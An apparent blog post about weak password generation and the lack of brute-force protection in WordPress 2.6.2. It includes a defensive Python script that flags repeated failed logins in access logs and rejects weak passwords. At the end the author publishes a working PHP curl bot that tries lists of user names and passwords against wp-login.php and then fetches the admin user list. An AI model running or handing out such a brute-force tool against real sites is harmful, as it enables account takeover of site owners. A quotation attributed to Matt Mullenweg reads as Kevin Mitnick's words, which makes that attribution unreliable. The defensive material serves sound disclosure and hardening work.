He who is firmly seated in authority soon learns to think security, and not progress, the highest lesson of statecraft.
James Russell Lowell
WordPress recently released version 2.6.2 after SecurityFocus published its article on the “WordPress Random Password Generation Insufficient Entropy Weakness”. A rather clumsy but effective exploit has also been published [wordpress exploit] to demonstrate the actual problem. It should also be noted that this is a design flaw: I have researched most of the previous versions, and almost all of them have the same password-generation issue.
What is an administrator or web owner to do? Here is the attitude of Matt Mullenweg, a lead developer of WordPress, on the subject.
I’d sit there and first I’d look through the comments, pick through the security holes, and then I’d see what the developer did to fix it because they’d always leave it well commented - thank you very much - and then I’d work back and figure out how I could write exploit code to exploit their vulnerabilities.
Kevin Mitnick
As shown time and time again, the weakest part of security is the person. In the case of WordPress, many of the developers don’t pay a lot of attention to the security aspect until it becomes a problem; the approach is very reactive and hardly ever proactive.
As an experiment on the several WordPress blogs I run, I created a simple curl bot that takes an array of users and an array of passwords and tries to brute force its way through the front door of the login form. Once in, it requests users.php, which in practice shows the admin user name on the first page along with the email address.
Surprisingly, even with this new WordPress 2.6.2 and its entropy-reinforced password generation, I was able to crack several of my own users’ passwords with a simple set of wordlists and user names. This is a crippling security flaw.
- No brute-force detection of any kind: no ban system, no IP logging, no record of failed attempts. There is no front-door security. This is the equivalent of a locked door in a place where no one can see you, so you have all the time you need to get in.
- There should be no dictionary words or easy-to-guess passwords in the database. The system should check for them, to ensure the security of the lock as a whole.
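The two points above are exactly the checks a site owner can add in front of wp-login.php. The script below is an added example written for this post, not WordPress code and not the curl bot: the first function counts failed login POSTs per source IP from web-server access-log lines and reports any IP that crosses a threshold inside a sliding window (the raw material for a ban list or IP log); the second rejects passwords that appear in a wordlist, are a wordlist word with digits appended, are too short, or contain the user name. The log lines are constructed, and the rule that a POST to wp-login.php answered with anything other than a 302 redirect is a failed attempt is an assumption based on the form being re-rendered on a bad password.

```python
"""Defensive checks for a WordPress front door (added example, not WordPress code)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" log format: ip ident user [time] "method path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample traffic: one host hammering the login form, one human who
# mistypes twice and then succeeds (302), one GET of the form, one malformed line.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Sep/2008:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 1532 "-" "curl/7.18.0"
203.0.113.7 - - [21/Sep/2008:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 1532 "-" "curl/7.18.0"
203.0.113.7 - - [21/Sep/2008:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 1532 "-" "curl/7.18.0"
203.0.113.7 - - [21/Sep/2008:10:00:03 +0000] "POST /wordpress/wp-login.php?redirect_to=%2Fwp-admin%2Fusers.php HTTP/1.1" 200 1532 "-" "curl/7.18.0"
203.0.113.7 - - [21/Sep/2008:10:00:04 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 1532 "-" "curl/7.18.0"
203.0.113.7 - - [21/Sep/2008:10:00:04 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 1532 "-" "curl/7.18.0"
198.51.100.4 - - [21/Sep/2008:10:00:10 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 1490 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Sep/2008:10:00:25 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Sep/2008:10:00:40 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Sep/2008:10:01:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
this line is not in combined log format
"""


def parse_line(line):
    """Return the fields we need from one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?")[0],  # drop the query string
        "status": int(m.group("status")),
    }


def is_failed_login(rec):
    # Assumption: wp-login.php re-renders the form (200) on a bad password and
    # redirects (302) on success, so a non-redirect POST counts as a failure.
    return (rec["method"] == "POST"
            and rec["path"].endswith("/wp-login.php")
            and rec["status"] != 302)


def failed_login_offenders(lines, threshold=5, window_seconds=300):
    """Return {ip: total_failures} for every IP with >= threshold failures in any window."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside the current window
    totals = defaultdict(int)     # ip -> all failures seen, for the report
    offenders = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_failed_login(rec):
            continue
        ip, ts = rec["ip"], rec["ts"]
        totals[ip] += 1
        q = recent[ip]
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()           # expire failures older than the window
        if len(q) >= threshold:
            offenders.add(ip)
    return {ip: totals[ip] for ip in sorted(offenders)}


# Constructed mini wordlist standing in for the kind of list the post refers to.
WEAK_WORDS = {"test", "test2", "test3", "password", "admin", "123456", "letmein", "wordpress"}


def password_is_weak(password, username, wordlist=WEAK_WORDS, min_length=8):
    """Return the reason a password should be rejected, or None if it passes."""
    p = password.lower()
    if len(password) < min_length:
        return "too short"
    if p in wordlist:
        return "in wordlist"
    if p.rstrip("0123456789") in wordlist:     # 'password1', 'test99'
        return "wordlist word with digits appended"
    if username and username.lower() in p:
        return "contains username"
    return None


if __name__ == "__main__":
    for ip, n in failed_login_offenders(SAMPLE_LOG.splitlines()).items():
        print(f"ban candidate {ip}: {n} failed logins")
    for pw in ("test", "password1", "Admin2008!", "correct horse battery"):
        print(pw, "->", password_is_weak(pw, "admin") or "ok")
```

Run against a real access log, the first function feeds whatever ban mechanism the host has (a firewall deny list, a .htaccess rule); inside WordPress itself the same counter can be kept from the wp_login_failed action hook instead of the web-server log. The password check belongs at account creation and password change, so that the weak entries never reach the database in the first place.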
That being said, I would like to release to the public the curl bot code I used. Please note that you have to create a readable and writable text file named cookiejar.txt in the same directory as the code below. I will come back and update this later, but this is all for now.
```php
<?php
// Login endpoint and the page to request once logged in.
define('POSTURL', 'http://www.abc.xyz/wordpress/wp-login.php');
define('SEEKURL', 'http://www.abc.xyz/wordpress/wp-admin/users.php');

$users = array('admin', 'bleh');
$pwd   = array('test', 'test2', 'test3');

// Try every user/password pair and print the full response, headers included.
foreach ($users as $k => $v) {
    foreach ($pwd as $key => $value) {
        echo ck($v, $value);
    }
}

function ck($log, $pwd) {
    // The same form fields wp-login.php expects; http_build_query URL-encodes the values.
    $POSTVARS = http_build_query(array(
        'log'         => $log,
        'pwd'         => $pwd,
        'wp-submit'   => 'Log In',
        'redirect_to' => SEEKURL,
    ));
    $ch = curl_init(POSTURL);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $POSTVARS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    // cookiejar.txt must exist and be writable in the script's directory.
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookiejar.txt');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $out = curl_exec($ch);
    curl_close($ch);
    return $out;
}
```